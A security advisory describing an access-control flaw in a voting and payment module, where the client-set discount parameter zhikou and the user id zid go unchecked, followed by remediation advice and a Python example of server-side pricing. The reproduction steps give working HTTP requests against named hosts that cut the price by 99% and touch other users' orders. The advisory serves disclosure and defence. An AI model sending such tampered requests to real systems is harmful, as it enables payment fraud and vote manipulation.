## Security Advisory: Incorrect Access Control in XiaozhangBang Voluntary Like System V8.8

### Summary

An Incorrect Access Control vulnerability has been identified in XiaozhangBang Voluntary Like System V8.8. The application fails to enforce server-side access control checks on critical parameters during the voting payment process. Specifically, the **zhikou** (discount) parameter can be modified by the client without validation, allowing unauthorized discounts and manipulation of the vote-purchasing mechanism. Additionally, an attacker can manipulate the **zid** parameter to influence purchases made by other users, further amplifying the impact.

### Affected Product

- Vendor: XiaozhangBang
- Product: Voluntary Like System
- Version: V8.8 (and possibly earlier versions)
- Component: Voting / Payment Module

### Impact

- Financial Loss: Unauthorized discounts lead to significant revenue loss.
- Integrity Violation: Attackers can unfairly manipulate vote counts for themselves and other users.

### CVSS v3.1 Score

- Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
- Base Score: 7.1 (High)

### Reproduction Steps

#### Step 1 - Purchase Votes

An attacker modifies the **zhikou** parameter in the payment request. For example, changing **zhikou=100** (full price) to **zhikou=1** results in an unauthorized discount of 99%, effectively allowing the purchase at only 0.01 of the original price (e.g. 200 RMB reduced to 2 RMB). By also modifying the **zid** parameter, the attacker can manipulate purchases for other users.

```http
POST /topfirst.php?g=Wap&m=Pay&a=wechat&token=6fK5tvIPejkkD9xm&id=3460&zid=183803 HTTP/1.1
Host: 444-2.gsthtlj.com
Content-Type: application/x-www-form-urlencoded

price=10&orderName=%E4%8A%BA%E6%B0%94%E7%A5%A8&num=20&zhikou=1&lid=595&vote=30&vid=3460&uid=183803
```

#### Step 2 - WeChat Pay

The manipulated order is processed by the payment gateway at the unauthorized discounted price.

```http
GET /topfirst.php?g=Wap&m=Pay&a=wechat&token=6fK5tvIPejkkD9xm&id=3460&zid=183803&code=071Iiz1006uI HTTP/1.1
Host: 444-2.gsthtlj.com
```

#### Step 3 - Payment Confirmation

The system confirms the payment and grants the attacker votes at the manipulated cost:

```http
GET /topfirst.php?g=Wap&m=Pay&a=success&no=wz2025082118381261957652541019 HTTP/1.1
Host: 534534.down444.zqkj1688.net.cn
```

### Remediation

- Enforce strict server-side access control for all pricing and discount parameters.
- Do not rely on client-supplied values such as **zhikou** to calculate transaction amounts.

### Timeline

- 2025-08-21: Vulnerability discovered and verified.
- 2025-08-24: Public disclosure prepared.

### References

- CWE-284 (Improper Access Control): https://cwe.mitre.org/data/definitions/284.html
- CWE-285 (Improper Authorization): https://cwe.mitre.org/data/definitions/285.html
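The remediation above, illustrated as an added example that is not the vendor's code: the order amount is recomputed from a server-side price table (hypothetical values chosen so the Step 1 request prices out at 200 RMB), the client-supplied `price` and `zhikou` are ignored, and the `zid`/`uid` in the request must match the authenticated session, which closes the cross-user purchase path described in the summary.

```python
from decimal import Decimal
from urllib.parse import parse_qs, urlparse

# Constructed catalog standing in for the application's database (hypothetical values).
UNIT_PRICE = {"3460": Decimal("10")}        # activity id -> price per vote pack, RMB
SERVER_DISCOUNT = {"3460": Decimal("100")}  # activity id -> zhikou, percent of list price

def parse_request(target, body):
    """Flatten the query string and form body into one dict of single values."""
    params = {k: v[0] for k, v in parse_qs(urlparse(target).query).items()}
    params.update({k: v[0] for k, v in parse_qs(body).items()})
    return params

def vulnerable_amount(params):
    """Mirrors the flaw: price, num and zhikou are all taken from the client."""
    return Decimal(params["price"]) * int(params["num"]) * Decimal(params["zhikou"]) / 100

def hardened_amount(session_uid, params):
    """Server-side pricing: the client may choose only the activity and the quantity."""
    # The order must belong to the authenticated account; zid/uid from the client are
    # compared against the session, never used to select another user's purchase.
    for key in ("zid", "uid"):
        if params.get(key) != session_uid:
            raise PermissionError(f"{key} does not match the authenticated user")
    vid = params["vid"]
    if vid not in UNIT_PRICE:
        raise ValueError("unknown activity")
    num = int(params["num"])
    if num <= 0:
        raise ValueError("quantity must be positive")
    # Client-supplied price and zhikou are deliberately ignored here.
    return UNIT_PRICE[vid] * num * SERVER_DISCOUNT[vid] / 100

# Constructed copy of the advisory's Step 1 request target and body.
TARGET = "/topfirst.php?g=Wap&m=Pay&a=wechat&token=6fK5tvIPejkkD9xm&id=3460&zid=183803"
BODY = "price=10&orderName=%E4%8A%BA%E6%B0%94%E7%A5%A8&num=20&zhikou=1&lid=595&vote=30&vid=3460&uid=183803"

if __name__ == "__main__":
    req = parse_request(TARGET, BODY)
    print("vulnerable:", vulnerable_amount(req))        # 2 RMB, as in the advisory
    print("hardened:  ", hardened_amount("183803", req))  # 200 RMB, full list price
```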